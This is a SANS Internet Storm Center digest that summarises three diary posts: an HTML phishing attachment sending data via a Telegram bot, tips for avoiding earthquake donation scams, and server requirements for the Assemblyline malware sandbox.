INTERNET STORM CENTER SPOTLIGHT
ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html
Simple HTML Phishing via Telegram Bot
Published: 2023-02-08
Last Updated: 2023-02-08 13:56:11 UTC
by Johannes Ullrich (Version: 1)
Monday, I wrote about the use of IP lookup APIs by bots. It turns out that it is not just bots using these APIs, but phishing e-mails are also taking advantage of them.
The phish itself is not particularly remarkable. It is arriving as an email claiming to include a payment confirmation. The email includes a small thread of messages likely to make it more plausible. The best I can guess, the email is supposed to make the recipient curious to open the attachment. The attachment itself is a simple HTML file simulating an Office 365 page.
Read the full entry:
https://isc.sans.edu/diary/Simple+HTML+Phishing+via+Telegram+Bot/29528/
Earthquake in Turkey and Syria: Be Aware of Possible Donation Scams
Published: 2023-02-06
Last Updated: 2023-02-06 18:40:43 UTC
by Johannes Ullrich (Version: 1)
Last night, Turkey and Syria were affected by a significant earthquake. Sadly, experience teaches us that disasters like this will often be abused. The most common scam involves fake donation websites. But you may also see malware disguised as a video or images from the affected region.
Here are some tips to share:
Do not donate to organizations you have not heard of before the event. Only donate to organizations that have an established track record.
If you have contacts in the affected area: Try to reach out to them to find out how to help them.
Scams may target people with links to the affected region. Be careful with phone calls or emails claiming to ask for money on behalf of a relative or friend. Scammers may use social media data and may contact you via social media.
Do not blindly believe requests for help on social media.
Do not just Google for ways to donate money.
Read the full entry: https://isc.sans.edu/diary/Earthquake+in+Turkey+and+Syria+Be+Aware+of+Possible+Donation+Scams/29518/
Assemblyline as a Malware Analysis Sandbox
Published: 2023-02-04
Last Updated: 2023-02-04 23:53:30 UTC
by Guy Bruneau (Version: 1)
If you are looking for a malware sandbox that is easy to install and maintain, Assenblyline (AL) [1] is likely the system you want to be part of your toolbox. "Once a file is submitted to Assemblyline, the system will automatically perform multiple checks to determine how to best process the file. One of Assemblyline's most powerful functionalities is its recursive analysis model."[2]
First step, install the server. My server configuration is as follow:
Ubuntu 22.04
Ubuntu Server (minimized)
8+ Cores
16+ GB RAM
100 GB
100+ GB /var/lib/docker
Static IP
Read the full entry:
https://isc.sans.edu/diary/Assemblyline+as+a+Malware+Analysis+Sandbox/29510/